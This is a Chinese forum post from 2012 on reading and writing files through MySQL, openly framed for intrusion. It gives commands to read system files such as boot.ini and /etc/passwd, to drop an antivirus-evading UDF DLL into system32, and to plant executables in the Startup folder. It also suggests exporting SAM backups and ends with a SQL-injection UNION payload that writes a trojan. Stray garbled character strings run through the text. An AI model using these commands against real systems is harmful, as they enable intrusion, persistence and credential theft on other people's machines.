找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2029|回复: 0
打印 上一主题 下一主题

mysql下读取文件的几种方式

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 4 B! V/ y8 |! B! o8 d' C3 `, }
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
+ W. _' T% o4 B! ]+ M/ U3 S; ~. i" z  ^  R9 S
mysql3.x下 ( J& Y* i) [& `. {1 f6 w& h! n+ K
, O. ]4 i8 k& F1 l7 {& ~5 m6 ?
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
& c3 c# _- p" Y( a8 i$ L7 b
# |; l1 w4 \" c( L. D" }9 Fmysql>create table a (cmd text); 7 O$ J  y/ I0 o& r  s/ s# x% f1 k
mysql>load data infile 'c:\\boot.ini' into table a; 6 H; R  g2 V, L' ^9 w
mysql>select * from a;
% @+ }. j0 ^  R/ l! U$ Z! i
9 k8 _7 }5 g3 K! rmysql4.x下
, ^+ R. G% B1 ^$ K. ~$ ^8 }; g3 v
2 V9 [3 t: Z7 H9 R6 dmysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下 0 Z, W9 L8 I' v9 h
( }+ K& W4 X- N& I9 J! `( {
mysql>create table a (cmd text); : y, T# I/ M. j+ j
mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
( G/ w0 D) s. N0 G% nmysql>select * from a; . w2 `$ i; P$ @# B: _1 Q8 |" q  W

+ G. R5 B) a8 k; Gmysql5.x下
  L/ o# m* |3 ?  J6 Z! x2 D, ~/ Z2 a+ T1 n2 h8 `" s
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
0 [1 _+ W" Q* i6 y) ^8 R7 ^/ U. s  x$ k, F$ ^
mysql>system cat /etc/passwd / E! @' X( n8 H( a: [: O, |6 \8 E

8 {0 a% @: j0 M9 N1 r8 N8 `: {1 G* ^+ W! g
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
- i/ Q& y# o0 ^; q7 p, i$ I2 j' F4 ^- _: f
% B$ O: Z' V4 ?
例:把免杀过的udf.dll文件插入系统目录 / b2 h+ R4 Q# j( e

# @# b2 T1 g4 a) L8 G! E3 Vcreate table a (cmd LONGBLOB); ; `( y3 w6 h5 h
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); 7 p, p1 z" A0 z+ ]' Y2 [2 r6 D
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
( Z6 y( [8 q# s" N% g* a( a2 Q0 k. |5 T
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 / ?0 S0 Z. Y  i9 K* b

# N9 A4 n+ l% q( v2 b' H1 P4 C* Q/ o6 C4 g
注入中的语法(未测试)
# f7 l5 x7 c- O- U' J
5 Z6 t0 r* t: M$ G/ |5 a$ w# v6 C  |( J# ~3 s% I, B  z" i
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表